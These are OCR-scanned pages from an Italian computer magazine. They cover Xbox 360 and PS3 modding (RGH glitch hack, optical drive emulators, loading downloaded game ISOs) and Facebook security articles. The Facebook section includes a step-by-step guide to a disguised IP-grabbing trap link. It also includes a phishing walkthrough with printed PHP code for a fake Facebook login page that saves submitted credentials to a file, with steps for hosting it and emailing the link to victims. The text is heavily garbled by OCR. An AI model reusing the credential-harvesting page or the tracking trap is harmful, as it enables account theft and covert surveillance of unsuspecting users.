per l'hack su console 

www.consoleopen.com 

Il più grande forum Italia¬ 
no che tratta l'hack su con¬ 
sole in maniera "open". 



LE PRINCIPALI 


TIPO DI MODIFICA 


FLASH DEL LETTORE 


RESET GLITCH HACK 


EMULATORI 
DEL LETTORE ODE 


MULTI NAND RGH 
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STORIA DELL'HACK SU XBOX 360 


Sin dagli inizi dell'era videoludica 
deintBOX 360 molti coder e svilup¬ 
patori di terze parti hanno posto la 
loro attenzione sul suo "unlocked”. I 
primi hack furono eseguiti sul letto¬ 
re: la Xbox 360 era (ed è tutt'oggi) 
dotata di un lettore DVD il cui firm¬ 
ware è "accoppiato" alla motherbo- 
ard con una chiave di decriptazione 
alfanumerica di 32 caratteri detta 
DVDKEY. Senza tale chiave nessun 
lettore poteva essere sostituito. Il pri¬ 
mo procedimento riguardò innanzi¬ 
tutto l'estrazione di tale stringa dal 
firmware del lettore. Una volta trova¬ 
to Il metodo, la strada fu in discesa: 
molti coder svilupparono software 
che, mediante procedure più o me¬ 
no complesse, estraevano tale chia¬ 
ve, la inserivano in un firmware svi¬ 
luppato "ad hoc"e la riscrivevano sul¬ 


la memoria del lettore, che veniva 
sbloccata sempre via software. Ci fu¬ 
rono varianti sia dei modelli di letto¬ 
re di cui la console era dotata sia di 
firmware che permettevano la ripro¬ 
duzione da disco dei backup. I primi 
coder ad affermarsi in tale hack furo¬ 
no Garyopa e C4eva. Con l'avvento 
della nuova console Xbox 360 SLIM, 
che sostituì la vecchia versione, la ca¬ 
sa produttrice cambiò il modello di 



lettore dentro le console con un mo¬ 
dello la cui memoria non era scrivibi¬ 
le via software. Ci vollero mesi prima 
di arrivare alla soluzione scoperta da 
Geremia, che consisteva nel "buca¬ 
re" letteralmente la memoria sulla 
piastra del lettore con un trapano 
dalla punta molto fine e arrivare a ta¬ 
gliare il filo interno alla memoria 
stessa che ne bloccava la scrittura via 
software. Fu però nel 2011 il vero col¬ 
po di coda della scena hack su tale 
piattaforma: un utente francese riu¬ 
scì a fare rallentare la CPU della con¬ 
sole, al fine di permettere ad un codi¬ 
ce non firmato di essere visualizzato 
su schermo restituendo alcune infor¬ 
mazioni univoche, prima di allora 
criptate, come la chiave di decripta¬ 
zione del DVD e della CPU. Tutte le 
informazioni vitali divennero così 


note al panorama underground. Il 
processo doveva svolgersi entro po¬ 
chissimi millisecondi e richiedeva 
una velocità di esecuzione incredibi¬ 
le, al fine di sostituirsi a quella di av¬ 
vio originale della console. Molti te¬ 
am svilupparono quindi sia hardwa¬ 
re per rendere tale operazione più 
veloce e semplice possibile, che in¬ 
terfacce e software per implementa¬ 
re dashboard alternative (ciò che ve¬ 
diamo a video) e per permettere alla 
console di riprodurre codice non fir¬ 
mato ed impedire alla stessa la verifi¬ 
ca della firma su ciò che esegue. Nac¬ 
que così la modifica Reset GUtch 
Hack, quella che ogni appassionato 
di console e videogiochi preferisce, 
poiché consente di avere un vero e 
proprio centro multimediale espan¬ 
dibile ed implementabile. 


nostra amata console può subire grazie 
all'apertura della stessa (e la conseguente 
invalidazione della garanzia ufficiale), la 
saldatura di alcuni componenti elettroni¬ 
ci o hardware specifici, che in molti casi 
sono necessari, ed al la riprogrammazione 
dell’intero sistema utilizzando software di 


terze parti creati appositamente per tale 
funzione. In base alle proprie esigenze, 
della capacità di interagire con il computer 
e con il software, del tempo a disposizione 
e dell’uso che si vuole fare della propria 
console si può ottenere un vero e proprio 
centro multimediale, godere appieno di 


funzionalità aggiuntive e riprodurre i pro¬ 
pri backup in svariati modi; l’importante 
è avere sempre presente che la pirateria 
uccide il commercio e lo sviluppo di sof¬ 
tware di qualsiasi tipo, quindi l’utilizzo di 
una console del genere deve essere fatto 
con criterio e con maturità. 


MODIFICHE CHE SI POSSONO ESEGUIRE SULLA XBOX 360 


DESCRIZIONE 


VANTAGGI 


SVANTAGGI 


Consiste nella riscrittura, tramite software, del 
firmware originale del lettore; lo stesso firmware 
viene sostituito con uno preparato "ad hoc", che 
permetta la riproduzione di ISO masterizzate su 
DVD+RDL. 

Viene sfruttato un impulso [Hgktdi), creato ed 
implementato da un Hardware installato (il GIMier) 
dentro la console, al fine di poter "inserire", durante 
la procedura di avvio della macchina, un codice 
non firmato che, una volta avviato, permetta la 
riproduzione di software non firmato dal produttore. 


Viene sfruttato un hardware che emula il lettore della 
console e permette la riproduzione di ISO da Hard 
Disk USB esterni 


Alla modifica RGH citata prima viene aggiunta 
una o più modalità di avvio. 

In tal maniera è possibile avviare la console anche in 
modalità originale e godere dei benefìci 
che ne conseguono 


• Immediatezza di utilizzo. 

• Permette il gioco Online (non è garantita la NON 
esclusione dal UVE ufficiale) 

• Permette la riproduzione da Hard Disk, interno 
od esterno, di codice non firmato, Backup dei 
propri giochi originali, Emulatori di retroconsole, 
homebrew ed applicazione di terze partì. 

• Permette un pieno controllo e la regolazione della 
temperatura di utilizzo della console. 

• Non sono strettamente necessari aggiornamenti 
successivi all'installazione 

• E’disattivabile 

• E'di immediato utilizzo 

• Permette di effettuare aggiornamenti ufficiali 
(disattivandolo) 

• Permette il gioco Online (Non è però garantita la 
NON esclusione dal UVE ufficiale) 

• Permette la riproduzione da Hard Disk, interno 
od esterno, di codice non firmato, Backup dei 
propri giochi originali, Emulatori di retroconsole, 
homebrew ed applicazione di terze parti. 

• Permette un pieno controllo e la regolazione della 
temperatura di utilizzo della console. 

• Permette, in modalità originale, di effettuare 
aggiornamenti ufficiali sulla console. 

• Permette il gioco Online in modalità originale (Non 
è pero'garantita la NON esclusione dal UVE ufficiale) 


• Compatibilità limitata con alcuni giochi. 

• Deve essere aggiornato ad ogni avvento di nuove 
protezioni inserite sui giochi. 

• Richiede un materizzatore compatibile con tali 
firmware 


• Non permette il gioco Online. 

• Ha tempi di avvio variabili (da 30 secondi a 2 minuti 
dall'accensione della console) 


• Non permette la riproduzione di software 
non firmato 

• Non permette l'esecuzione di emulatori 
od Homebrew 

• Il costo dell'emulatore 


• Ha tempi di avvio variabili (da 30 secondi a 2 minuti 
dall'accensione della console) 
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AVVIO GIOCHI DA DISCO 

Con la modifica firmware sul lettore, il pirata da noi 
intervistato ci ha spiegato che i giochi vengono 
masterizzati su dischi DVD da 8GB utilizzando il 
software gratuito IMGBURN, previa patch con il 
software ABGX 360, anch'esso gratuito e facilmente 
reperibile in rete. É richiesta una connessione ad 
Internet durante l'esecuzione del programma. 

Dopo aver avviato il tool sarà sufficiente spostarsi 
prima nella sezione Auto Fi *re successivamente in 
Options per settare le varie opzioni in modo corretto. 



Al termine, il pirata procederà al caricamento del 
gioco in fonnato ISO selezionando il file immagine e 
diccando il pulsante Launch .Tutta questa procedura, 
continua a raccontarci il pirata, serve per rendere le 
copie di backup il più possibile simili agli originali, 
onde ce ne fosse bisogno, e quindi di assicurarne il 
funzionamento su lettori con la modifica firmware. 

Nei canali underground generalmente i giochi si 
trovano pronti per la masterizzazione e formati da un 
file .ISO e da un file .DVD con lo stesso nome che 
precede l’estensione. In IMGBURN sarà sufficiente 
selezionare il file .DVD; il software automaticamente 
masterizzerà il .ISO su disco, associandogli alcuni 
importanti parametri per una scrittura corretta (come 
il LAYERBREAK) 



ESEMPI DI COMPONENTI NECESSARI ALLE VARIE MODIFICHE 


Durante la nostra chiacchierata, il pirata si è anche se genericamente onboard montano: 

soffermato sui componenti elettronici che ogni 

tipo di modifica richiede; essi si frappongono, «Un processore che esegue calcoli ed operazioni; 

in un'ipotetica "linea dell'hack", fra l'hardware • Componenti passivi per attenuare, distoreere, 


originale e l'output, ovvero quello che esce dalla pilotare i segnali; 


nostra console a livello di segnali video e di features 
aggiuntive. Abbiamo così scoperto che la qualità 
di ogni componente può variare da produttore a 


• Memorie aggiuntive per permettere 
modalità di avvio aggiuntive; 

•Veri e propri circuiti di emulazione 


produttore, così come il loro costo e la loro forma, 


del lettore originale; 




ultima generazione 
per la modifica RGH (in 
fotoilCooIRunnerProdiTeam 
Executer) che integra un processore 
e I componenti passivi per attenuare, 
distoreere e pilotare i segnali (vedi tabella 
Le principali modifiche che si possono eseguire 
sulla Xbox 360). 


Il Demondi Team 
Executer consente di avviare 
la console Xbox 360 sia in modalità 
originale (per potersi collegare a Xbox Live) 
sia in modalità RGM. 


Una scheda logica del lettore per la 
modifica firmware usata per avviare i 
backup dei giochi masterizzati su DVD 
Dual Layer (vedi tabella Le principali 
modifiche che si possono eseguire 
sulla xbox 360) 
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La console delle modifiche 

Il pirata della console ci spiega che sul¬ 
la Xbox 360, ad esempio, le modifiche si 
possono suddividere in quattro categorie, 
ognuna delle quali richiede un diverso 
hardware per essere eseguita, offre fea- 
tures diverse all’utilizzatore, e differisce 
per modalità e procedure di utilizzo. Si 
possono cosi avere: modifica sulfirmwa¬ 
re del lettore della console, modifica con 
l'installazione di un dispositivo sulla mo- 
therboard, modifica con un hardware che 
emula il comportamento del lettore della 
console, e modifica che permette modalità 
di avvio differenti in base alla necessità 
dell’utilizzatore. Ciascuna delle procedure 
descritte, prevede per chi la effettua dei 
passaggi obbligati e per niente scontati, 
richiede manualità e molte volte presenta 
insidie dovute alle variabili esterne come 
la strumentazione, la qualità dei materiali 
usati; il saper fare fronte a queste variabili 
distingue un modder dagli altri e lo rende 
migliore o peggiore, anche se, nella scena, 
sai sempre che c'è qualcuno meglio di te, 
che ha qualcosa da insegnarti o conoscen¬ 
ze tecniche più sviluppate delle tue, anche 
se tutto nasce e si basa sulla condivisione 
reciproca. 

Occhio alla garanzia 

È importante, se non basilare, ricordare ai 
nostri lettori che l’apertura della console 
di gioco per tutte le operazioni di hack o 
modifica di qualsiasi parte, compresa 
quella software, implicano il decadimento 
della garanzia ufficiale del produttore. In 
caso di modifica, di qualsiasi tipo, sulla 
console, ed accesso ai servizi LIVE, lo si fa 
a rischio e pericolo di BAN, ovvero esclu¬ 
sione dai servizi videoludici stessi e con 


Un esempio di installazione di un 
Glitcher sulla motherbard dell' 

Xbox 360. Tale operazione richiede 
manualità e precisione nell'eseguire 
le numerose microsaldature. 



RIPRODUZIONE GIOCHI DA USB 


Nei tipi di modifica in cui è permessa la riproduzione 
di Backup da supporti rimovibili USB è necessario 
"preparare'questi ultimi affinché vengano riconosciuti 
dalla console stessa o dall’HARDWARE che li ospita. 
Anche in questo caso il piarata d ha fornito qualche 
dettaglio pratico. Nel caso di emulatore del Lettore 
ODE, è sufficiente formattare il supporto USB che si 
vuole utilizzare in NTFS. Dentro la root principale si 
creerà una cartella chiamata CAMES ed all'interno 
si copieranno le ISO nude e crude. Attraverso akuni 
semplici passaggi sull'interfaccia ufficiale (dashboard) 
della console viene caricato il menù di selezione della 
ISO stessa. Per le modifiche Reset Glitch Hack e 
MultiNand RGH è necessario invece formattare 
il supporto USB in FAT32 e creare all'interno una 
cartella destinata ad ospitare i giochi in formato GOD 
o folder. Attraverso un software di conversione, 
freeware e reperibile in rete come IS02G0D, si 
trasformano le ISO nude e crude in formati riconosciuti 
dalla console e si copiano sul supporto USB. Sarà 
sufficiente poi selezionarne il percorso di ricerca 
dall'interfaccia dedicata (Freeboot) e ritrovarseli 
tutti nel catalogo di Freeboot stesso, pronti per 
essere giocati. IS02G0D rappresenta il software di 
conversione per eccellenza, sia per la praticità che 
per la velocità di utilizzo. Caricata l'immagine ISo 
del gioco è sufficiente cliccare Convert per iniziare 
le operazioni di conversione e copia. Alla fine del 
processo avremo direttamente il gioco convertito 
sotto forma di cartella alfanumerica, ovviamente nel 
percorso che abbiamo precedentemente scelto in 
OUTPUT. Allo stesso modo è possibile selezionare 
come destinazione l'Hard Disk della console. 



previa connessione in rete di quest'ultima tramite 
cavo ethemet. Basterà impostare l'indirizzo IP di 
quest'ultima ed il gioco è fatto (user: xbox e password: 
xbox). Per i possessori di modifica RGH sarà necessario 
impostare nelle impostazioni della Dashboard 
alternativa -chiamata Freestyle - dove “cercarsi" i 
giochi, gli emulatori, gli homebrew e quanfaltro; sarà 
sufficiente andare nelle impostazioni e cliccare su 
imposta percorsi, selezionando una profondità di 
scansione massima e seguendo le istruzioni a video. 



il rischio di poter utilizzare la console 
esclusivamente offline. Inoltre, è doveroso 
fare capire a chi legge che lo spirito con 
cui un coder o un hacker affronta le sfide 


imposte da blocchi strutturali e quello 
di rendere "OPEN” la console stessa, ov¬ 
vero espanderne la compatibilità il più 
possibile. 
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“Così sblocco la mia console per giocare ai top title 

scaricati dalla Rete”. Ecco la guida unofficial 

@3: la modifica 

è servita! 


A nche la Playstation 3, finora "blindatissi¬ 
ma’’ con i suoi ultimi firmware a prova di 
back, si è dovuta inchinare ai pirati delle 
console! Quasi in concomitanza con la nuova 
revisione della scheda madre e delle dimensioni 
esterne (è infatti uscita la PS3 Super Slim, delle 
dimensioni di un foglio A4 all'incirca), alcuni 
smanettoni hanno infatti trovato il modo di usa¬ 
re supporti multimediali USB come pendrive o 
hard disk esterni peremulareilettori ottici delle 
console, riuscendo di conseguenza a caricare 
i backup dei giochi originali in formato ISO. 

Storia di una modifica 

I numerosi produttori di hardware non si sono 
certo lasciati scappare l'occasione di mone¬ 
tizzare e ricavare un lauto profitto da questo 
"bypass” di sistema della Playstation 3, ini¬ 
ziando a progettare, implementare ed infine 


mettere sul mercato i loro prodotti che, una volta 
installati e configurati all'interno delle console, 
permettono il caricamento dei backup dei gio¬ 
chi. Siamo quindi riusciti ad entrare in contatto 
con uno smanettone pratico con le modifiche 
delle console che ci ha fornito una panoramica 
di questi emulatori, chiamati tecnicamente ODE 
(Optical Drive Emulator) e capaci di simulare il 
funzionamento del lettore originale della PS3 
sostituendolo con un hard disk USB. 

L’hardware in dettaglio 

Lo smanettone ci spiega che al momento gli 
emulatori più utilizzati disponibili sul mercato 
sono tre e, a parità di prezzo, offrono tutti le 
medesime caratteristiche tecniche. Scopriamo 
anche che dietro la realizzazione e la proget¬ 
tazione di questi dispositivi hardware sono 
presenti dei team di sviluppo che hanno impie- 
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VANTAGGI E SVANTAGGI NELL'INSTALLAZIONE 
DEGLI HACK PER PS3 

Riepiloghiamo nella tabella sottostante i punti di forza e gli svantaggi per l'utilizzatore 
finale di ognuno degli ODE descritti nell'articolo. 


TIPO DI ODE 

VANTAGGI 

SVANTAGGI 

3K3Y 

Team di sviluppo in continuo 
aggiornamento, così come 
continuo è il supporto 
all'utilizzatore finale 

Richiede l'intervento "manuale" 
dell'utilizzatore sulla console per 
selezionare il backup da caricare 

COBRA ODE 

Interfaccia e menu di gestione 
davvero gradevoli e di facile utilizzo 

Richiede il riawio della console tra 
la selezione e l'effettiva procedura 
di start del backup da caricare 

E3 ODE PRO 

Procedure di installazione ed 
utilizzo semplicissime e intuitive 

Menu minimale per la selezione del 
backup da eseguire 


gato tempo e risorse per ottenere il loro perfetto 
funzionamento. I primi a giungere sul mercato 
con i loro prodotti sono stati i componenti del 
gruppo 3k3y, forti anche del successo ottenuto 
col "fratello maggiore” x360key, l'emulatore di 



■ Il 3k3y PCB Package PS3 è stato il primo 
emulatore per Playstation 3 a giungere sul mercato 
degli hack per console. 


lettori per Xbox 360 e Xbox 360 Slim prodotto 
e supportato con successo dallo stesso team 
disviluppo. 

Il secondo emulatore a giungere alla fase di 
distribuzione è stato il Cobra ODE, sviluppato e 
prodotto dal Team Cobra che precedentemente 
aveva già sviluppato qualche anno fa un parti¬ 
colare hardware USB utile per il jailbreack della 
prima versione della PS3. 

L'ultimo emulatore, in ordine di tempo, a giun¬ 
gere sul mercato è stato l’E3 ODE PRO, suppor¬ 
tato da un team di sviluppo che ha progettato e 
distribuito precedentemente un “flasher" che 
permetteva di leggere e modificare il contenuto 
della memoria NAND installata nelle PS3, dando 
la possibilità agli smanettoni di effettuare un 
downgrade del firmware. 


SBLOCCO LA PS3 IN SOLI 4 PASSI" 

dell’installazione di un emulatore di unità ottica su PS3, ricordando 
a “misura” i vari componenti. 



La parola all'avvocato 


■ Dott. Marco 
Giacomello, Associate 
dello studio legale 
MPS Law 


MODCHIP: COSA 
PREVEDE LA LEGGE 



Win Magazine L'installazione dei modchip è 
permessa dalla nostra legislazione? 

Marco Giacomello Prima di rispondere occorre 
fare una piccola premessa e parlare anche di 
Jailbreak. Questa procedura era diventata legale 
negli USA (relativamente ai soli smartphone) 
nel 2012 grazie ad una modifica del DMCA 
(Digital Millenium Copyright Act), la legge sul 
copyright statunitense.Tale modifica era stata 
giustificata come il giusto ripristino delledovute 
garanzie di interoperabilità di cui l'utente deve 
poter godere. Interoperabilità che, soprattutto 
per quanto riguarda i contenuti, veniva limi¬ 
tata dai grandi vendor del mercato facendo 
in modo che le applicazioni potessero essere 
acquistate esclusivamente dal proprio market 
store. Decadeva ovviamente la garanzia del 
device sul quale veniva effettuato lo "sbloc¬ 
co", ma tale operazione non era più qualificata 
come copyright infringement: una cosa è la 
legalità dello sblocco, un'altra sono i termini di 
garanzia del device. A partire dal 26 gennaio di 
quest'anno, il jailbreaking è tornato invece ad 
essere considerata come pratica illegale negli 
USA anche per gli smartphone. 

WM L'installazione dei modchip è invece per¬ 
messa dalla nostra legislazione? 

MG L'orientamento delle nostri corti di giustizia 
considera l'applicazione dei cosiddetti modchip 
e, più in generale, le modifiche per le console da 
gioco come illecite per violazione dell'art. 171 - 
ter della nostra legge sul diritto d'autore. Molte 
sono invece le posizioni dottrinali opposte, 
le quali valutano i modchip come importanti 
strumenti per garantire interoperabilità e incen¬ 
tivare gli sviluppatori indipendenti. Attualmente 
siamo in attesa di un'importante decisione sul 
caso che vede contrapposte Nintendo e PCBox, 
azienda fiorentina che produce modchip in gra¬ 
do di permettere l'utilizzo su Wii e DS di giochi 
copiati o realizzati al di fuori delle piattaforma 
di sviluppo di Nintendo. La Corte di Giustizia 
si sta chiedendo se davvero non esistano DRM 
che impediscano l'utilizzo di giochi piratati, 
permettendo al contempo quelli sviluppati 
indipendentemente (i c.d. giochi homebrew). 

s_, 
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■ Il Cobra ODE è l'emulatore per PS3 sviluppato dallo stesso team che, qualche anno fa, ^ ODE Pro è Stato I ultimo emulatore ad essere reso disponibile 

era riusdto a mettere a punto il jailbreak della prima versione della console di gioco. per la modifica della Playstation 3. 



Ai limiti della legalità 

La nostra chiacchierata sui mondo delle mo¬ 
difiche alle console di gioco si conclude con 
una sorta di raccomandazione da parte del 
nostro amico smanettone. Come tutto ciò che 
può essere usato ai limiti della legalità, ci dice, 
è bene precisare che tali emulatori sono utiliz¬ 
zati soprattutto come "Development Board", 
cioè come tavoli di prova per gli sviluppatori: 


l’obiettivo finale è dunque sempre quello di riu¬ 
scire ad espandere le funzionalità multimediali 
delle console, riuscire a caricare codice non per 
forza proprietario e preservare i propri giochi 
originali dal logorio dell'utilizzo. Come dire: 
l’hack della PS3 è ormai alla portata di tutti, 
ma la sua messa in pratica potrebbe causarci 
non pochi problemi relativamente alla licenza 
d’uso della console. 


COME FUNZIONANO TECNICAMENTE 
GLI HACK DELLA PLAYSTATION 3 


■ Il tool Cobra Manager è un'interfaccia grafica utilizzata dai pirati delle console di gioco per gestire 
il caricamento sulle PS3 modificate delle immagini ISO dei giochi scaricati da Internet. 


Tutti e tre gli emulatori per Playstation 3 analizzati neil’ar- 
ticolo funzionano a grandi linee allo stesso modo: si 
interfacriano fra il lettore e la scheda madre del la console, 
intercettandoe decodificando il segnale diretto al lettore 
Blu-ray e simulandone il funzionamento. In questo modo, 
l'hard disk esterno USB che contiene i backup dei giochi 
originali verrà di fatto rilevato come se fosse proprio il 
lettore ottico della console, mentre l'immagine ISO del 
gioco sarà "camuffata" come il disco del gioco originale. 


All'accensione della console, inoltre, sarà necessario avere 
l'hard disk USB connesso all'emulatore tramite cavo USB: la 
PS3 ne rileverà così il contenuto e, tramite il menu presente 
sulla XMB (la XrossMediaBar), permetterà di eseguire la 
scelta del backup di gioco da caricare. È bene notare che 
all'interno del lettore deve essere sempre presente un 
disco originale. Allo stesso modo è possibile avviare la 
console in modalità "originale"e godersi i propri giochi 
regolarmente acquistati. 














Per saperne di più 


A scuola di hacker 0 


Usando uno stratagemma è possibile scoprire l'indirizzo 

IP di chi clicca sui post che pubblichiamo in bacheca 


Chi sbircia nel 
Diario Facebook? 


Cosaci O 
occorre 


SERVIZIO DI 
"CATTURA IP" 


IP GRABBER 


Quanto costa Gratuite 

Sito Internet 

www.hackerstribe.com 


S ul Web è facile imbattersi in false applica¬ 
zioni che permettono di scoprire chi visita 
il nostro profilo Facebook, oppure quello 
su Ask.fm, Twitter e tutti gli altri più famosi so¬ 
cial network. Generalmente queste app hanno 


semplicemente lo scopo di rubare i nostri dati 
personali al fine di inviare e-mail di spam o di 
intasare le bacheche Facebook con messaggi 
pubblicitari automatici. Per scoprire davvero chi 
visita frequentemente la nostra bacheca "sbircian¬ 


do" troppo tra i nostri post possiamo sfruttare il 
servizio on-line IP Grabber: con pochi clic ci per¬ 
metterà di generare un link trappola per attirare 
l’impiccione di turno e intercettarne rindirizzo 
IP così da risalire poi alla sua vera identità. 


1 Oop 

>o«4| 

2 IH 

Wfi i| 

Snnc il 


tur j da 
. H 


nacn«r$ Trito rxcverà le seguenti 
«•ormaiioni su di le prono puontrn waoogk 
amici inforzo e-ma* « Ili piace" 


A Qo«fCO w con»#«C* »r»pp<iro-'« <> (K&àkCV* «U F*C#SOO* 


B-. » Me prrvKY 



IP Grabber E* gratis e sempre lo sarà! 



Winmagazine 


>/ 


http //www facebook com 


O ACCORO 


ciccando ateo» i eone» • condizioni di 

questo servizio Dopo aver completato la registrazione, un 
Mnk personalizzato da mandar* agli utenti verrà generate 


Iscriviamoci al servizio on-line 

ve II primo passo da seguire per iniziare a scoprire chi visita il diario Facebook 
I è quello di iscriversi al servizio IP Grabber. Colleghiamoci a http://hackerstri- 
JIm be.com/ip_grabber e premiamo Fai click qui. Procediamo poi all’autentica¬ 
zione tramite Facebook ciccando OK (dobbiamo aver g ià effettuato l’accesso al social 
network) e completiamo la registrazione con i dati richiesti dal servizio. 

IP Grabber - E' gratis e sempre lo sarà 1 




Ottima! La procedura è completa, qui il link al tuo IP grabber 


http://goo gl/KT 


Prepariamo la trappola per oli impiccioni 

Q Per non destare sospetti configuriamo il servizio per effettuare un redirect 
I verso una pagina esterna (un video o lo stesso Facebook). Quando l’uten- 

__J te effettuerà un clic sul link fornito da IP Grabber verrà spedito alla pagina 

da noi scelta. Potremmo quindi divulgare il linksottoforma di video divertente impo- 
standoun redirect verso un canaleYouTube. Completiamo con Registra IP Grabber 


Nuovo IP catturato! 


Posta in armo x 


w © 


13 41 (0 minuti fa) 


hacker57@box940.bluehost.com 

a me - 

Nuovo IP catturato! 


Ciao 

Ecco rindinzzo appena catturato dal tuo IP-Giabber 93.44 

■ I -J-.a ri fMKHO ;r ii'.i.'i taiemo l.»l, m amati 


Inseriamo il link segreto sul Diario 

| Terminata la configurazione del servizio ci verrà fornito un link da inse¬ 
rire sul diario Facebook. Quando qualcuno ci cliccherà sopra, riceve- 
' remo un’e-mail contenente il suo indirizzo IP. Potremmo quindi spac¬ 
ciare il video YouTube precedentemente impostato come trappola per i fur¬ 
bacchioni che visitano spesso il profilo Facebook e controllano tutte le nostre 
attività sul social network. 


Cosi scopriamo chi ci soia sui social network! 

a Per analizzare un IP, inviamo lo stesso URL usato in precedenza agli 
utenti che riteniamo sospetti. Se, dopo che quest’ultimi avranno aper¬ 
to il link, l’indirizzo IP sarà lo stesso di quello ricevuto avremo scoper¬ 
to il furbacchione! In alternativa, copiamo l’IP su www.ip-adress.com/ip_tra- 
cer per ottenere la zona di provenienza (con precisione ridotta) dell'IP e cer¬ 
care di individuare lo spione! 
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Metti 

il tuo 


al sicuro 
Facebook! 


Cosaci O 
occorre 

SOCIAL NETWORK 

FACEBOOK 

Quanto costa: Gratuito 
Sito Internet 

www.facebook.com 


Scopri le tecniche usate dai pirati informatici per violare 
il social network e impara a difendere la tua identità 


F acebook è divenuto negli anni un 
servizio Web così popolare che sono 
ormai rimasti davvero in pochi gli 
internauti che non possiedono un account 
al social network più famoso del mondo. 
Del resto questa piattaforma risulta molto 
comoda agli iscritti per tenersi in contatto 
tra di loro, postare e condividere immagini 
e informazioni di ogni genere, ricevere no¬ 
tizie mirate dal Web e molto altro ancora. 
Come era però facile prevedere, proprio 
l'enorme successo di Facebook, anche gra¬ 
zie alla diffusione sempre più capillare di 
dispositivi mobili connessi alla Rete, ha 
finito per attirare l’attenzione dei pirati 
informatici che hanno trovato in questa 
piattaforma un universo sconfinato in cui 
poter scorrazzare per rubare dati personali 
e non solo. 


I pericoli di Facebook 

Forse non ci abbiamo mai pensato, ma la 
cosa più semplice che ci possa capitare sul 
social network è, ad esempio, che un malin¬ 
tenzionato ci attiri con un trucco su una fìnta 
pagina Facebookper rubarci le credenziali di 
accesso e poi spiare le nostre attività on-line 
e utilizzare come più gli pare e piace il profilo 
e i contenuti in esso presenti. Un’eventualità 
questa neanche troppo remota, soprattutto 
per quegli utenti della Rete un po’ distratti 
che non fanno troppo caso alle pagine Web 
che visitano. Immaginiamo solamente i 
danni che un estraneo può creare al nostro 
profilo cancellando e modificando i post in 
bacheca o semplicemente violando la nostra 
privacy leggendo cose che prima erano ac¬ 
cessibili solo ad un numero ristretto di amici. 
Viceversa può anche accadere che a nostra 


insaputa qualcuno, utilizzando uno dei no¬ 
stri indirizzi di posta elettronica, registri un 
account su Facebook compiendo un vero e 
proprio furto d’identità, ovvero spacciandosi 
per noi sul social network. C’è poi chi, ad¬ 
dirittura, si piglia la briga di creare un falso 
profilo Facebook che viene disattivato dopo 
qualche ora, giusto il tempo per richiedere e 
ottenere la nostra amicizia per poter parlare 
male di noi con tutti i nostri contatti e rovi¬ 
narci la reputazione. Come difendersi allora 
da questi pericoli? La soluzione è semplice: 
basta seguire il famoso adagio che recita “se 
lo conosci, lo eviti’’. In ogni caso Win Magazi- 
ne ti da le indicazioni e gli accorgimenti per 
evitare di cadere in una di queste "trappole 
2.0” e riportare tutto alla normalità nel caso 
in cui siamo divenuti inconsapevolmente 
vittime dei pirati di Facebook. 


COSI I PIRATI METTONO SOTTO SCACCO IL TUO DIARIO 

Dal furto del profilo alla creazione di un account a tempo: ecco come uno smanettone può impossessarsi di un profilo Facebook per 
mettere a repentaglio la nostra privacy e rovinarci la reputazione sul social network. 


6 - 6 " 



/,7A589 POLICE DEPARTMENT 


Furto del profilo Facebook 

Un pirata informatico può prepararti una trappola 
sul Web e rubarci con l’inganno le credenziali di 
accesso al social network. Scopriamo quali sono 
le tecniche adottate per entrare nel nostro account 

Facebook e come riprenderne il controllo. pjg.81 
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47A589 POLICE DEPARTMENT 

Un account non autorizzato 

Su facebook malintenzionati o sistemi automatizzali 
possono utilizzare un nostro indirizzo c-mail per 
registrare un fàJso profilo a noi intestata In pochi 
passi possiamo segnalare questo abuso al social 
network e disattivare l'account ™ 


POLICE DEPARTMENT 


Nuove amicizie, ma a tempo! 

O chi crea un account temporaneo su Facebook 
con il solo scopo di fare scherzi o rovinare la repu¬ 
tazione di altri utenti. Per farlo il pirata esegue una 
registrazione falsa e incompleta al social network. Vi 
sveliamo tutti i retroscena. pag.83 
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Furto del profilo Facebook 

Uno dei trucchi più utilizzati dai pirati informatici per rubare le credenziali di accesso 
al social è quello di creare una falsa home page del sito. Svelati i retroscena. 


Scarica il Fakelogin-Facebook 

fc ovviamente, da attento avrete capito, a tutto GRATIS! 

fariseo eh# qual soldi li investano par comprare casa grana ad un presi 



I ferri del mestiere 

II pirata Informatico si collega alla pagina 
http://goo.gl/tLq5Gz ed effettua il downlo¬ 
ad di una falsa home page di Facebook già pronta 
all'uso, così da non scrivere neanche una riga di 
codice. Al termine del download estrae il contenuto 
dell’archivio in formato ZIP sul Desktop del suo PC. 


v ^Aprl * ^ salva 4% Annulla 

‘posl.plip H 
<?php 

/eeeeeeeeeee***eee*eeee*eeeeee 

Autore : Pasquale Scarpati di « www.asnscan.coi 
Script : Fakelogin Facebook 

ea.aaaaaaaaaaaaaaaaaaaaeaaaaa/ 

header ( , Location:http://it-it.facebook.eoa/’ ); 

$handle = fopenCdati.txt", “a"); 

foreach(S POST as Svanablc *> Svaluc) { 

fwrite(Shandle, $variable); 

tvnteiStiantile, 

twritejshandle, Svaluc); 

twrite(Shandle, "\r\n"); 


^ TUtto all’interno di un file 

Il pirata accede quindi alla directory nella 
quale ha scompattato l’archivio e apre il 
file post.php con un editor di testo non formattato 
(ad esempio il Blocco Note di Windows) per asse¬ 
gnare un nome al file nel quale verranno memoriz¬ 
zati i dati delle vittime (nel caso in figura dati.txt). 



^ Una home oaae fasulla 

3 Al pirata non resta quindi che caricare i 
tre file scompattati nel suo spazio Web (ad 
esempio uno gratuito su Altervista) e inviare alla 
vittima un’e-mail col link da raggiungere. La pagi¬ 
na visualizzata, però, non è quella di Facebook, 
quindi occhio all'Indirizzo mostrato nel browser! 


COSI RECUPERIAMO L'ACCESSO AL NOSTRO DIARIO 


Per quanto il nostro account Facebook 
possa rivelarsi blindato (dopo aver adot¬ 
tato opportune misure di sicurezza, co¬ 
me ad esempio il passaggio al protocollo 
HTTPS per l'indirizzo), al mondo esisterà 
sempre almeno un pirata capace di im¬ 
possessarsi della nostra identità virtuale. 

E, nel caso in cui qualcuno sia riuscito 
a rubarla, non dobbiamo far altro che 
sperare che non abbia già proceduto al 
cambio della e-mail di registrazione o del 
numero di cellulare collegato all'account 
stesso. Già, perché come ben sappiamo, 
ad ogni account Facebook è associato 
un indirizzo di posta elettronica (utiliz¬ 
zato durante la registrazione) sul quale 
è possibile ricevere oltre che a notifiche 
di tutti i tipi, anche il modulo che ci per¬ 
metterà di resettare la nostra password. 
La stessa procedura può essere effettuata 
confermando un SMS ricevuto sul nostro 
telefonino. 

PROCEDURA DI RECUPERO 

1 Raggiungiamo la pagina di login di 
Facebook e cricchiamo sul pulsante 
Hai dimenticato la password?. Com¬ 
piliamo il campo presente indicando il 
nostro indirizzo di posta elettronica o, in 



